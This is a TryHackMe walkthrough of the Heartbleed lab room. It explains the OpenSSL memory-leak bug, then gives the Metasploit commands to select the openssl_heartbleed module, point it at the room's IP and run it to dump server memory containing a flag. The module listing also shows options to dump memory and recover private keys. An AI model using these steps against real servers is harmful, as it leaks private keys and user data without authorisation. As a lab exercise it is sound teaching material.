Try Hack Me - HeartBleed

Howdy my fellow Cyber Enthusiasts! Welcome to another room Try Hack Me offers! So let's dive in! 😄

This guide is for Linux users, these commands will not work for Windows. You can always use Attackbox from Try Hack Me, which will open a Linux Machine accessible from the web browser.

If you use the VPN, you can follow the instructions from the THM website found here.

Connecting to OpenVPN on Linux and Mac | TryHackMe Help Center

TryHackMe Help Center

The Hearbleed Bug is a serious vulnerability in the famous OpenSSL software library. This vulnerability gives the opportunity of malicious actors to steal protected information, by the SSL/TLS encryption. Privacy and security over the Internet is provided by the SSL/TLS for applications such as email, web, IM and virtual private networks.

This bug is very important because every person on the Internet can read the systems memory that is protected by these vulnerable versions of the OpenSSL software. Thus, malicious actors have the ability to eavesdrop on these communicatios, impersonate users or services and steal data from users.

In order for this must abuse to stop, openssl has a released an update that can be found in the following link.

As the title of this room is Heartbleed, it's obvious that we are dealing with that specific vulnerability. Let's open msfconsole and do our magic there. if you don't have it installed you can do that with the following command.

sudo apt install metasploit-framework

Now, start msfconsole and search for hearbleed using the following commands.

msfconsole
search heartbleed

Matching Modules
================

   #  Name                                                    Disclosure Date  Rank    Check  Description
   -  ----                                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/elasticsearch_memory_disclosure  2021-07-21       normal  Yes    Elasticsearch Memory Disclosure
   1    \_ action: DUMP                                       .                .       .      Dump memory contents to loot
   2    \_ action: SCAN                                       .                .       .      Check hosts for vulnerability
   3  auxiliary/server/openssl_heartbeat_client_memory        2014-04-07       normal  No     OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
   4  auxiliary/scanner/ssl/openssl_heartbleed                2014-04-07       normal  Yes    OpenSSL Heartbeat (Heartbleed) Information Leak
   5    \_ action: DUMP                                       .                .       .      Dump memory contents to loot
   6    \_ action: KEYS                                       .                .       .      Recover private keys from memory
   7    \_ action: SCAN                                       .                .       .      Check hosts for vulnerability


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/ssl/openssl_heartbleed
After interacting with a module you can manually set a ACTION with set ACTION 'SCAN'

We are interested in the 4 option, so to select use the following.

msf > use 4

[*] Setting default action SCAN - view all 3 actions with the show actions command
msf auxiliary(scanner/ssl/openssl_heartbleed) >

To see our available options, including the target machine, our IP address, port and various others use the following commands, including run at the end to run it. Remember, as RHOSTS use the IP of the room.

show options

msf auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 10.65.84.131
RHOSTS => 10.65.84.131
msf auxiliary(scanner/ssl/openssl_heartbleed) > set Verbose True
Verbose => true
msf auxiliary(scanner/ssl/openssl_heartbleed) > set Action scan
Action => scan
run

You will see a lot of data sent back to you, don't worry this is normal. You must find the flag, which follows the format of THM{}.

Congratulations! You have solved this room! 🎉 🎉 🎉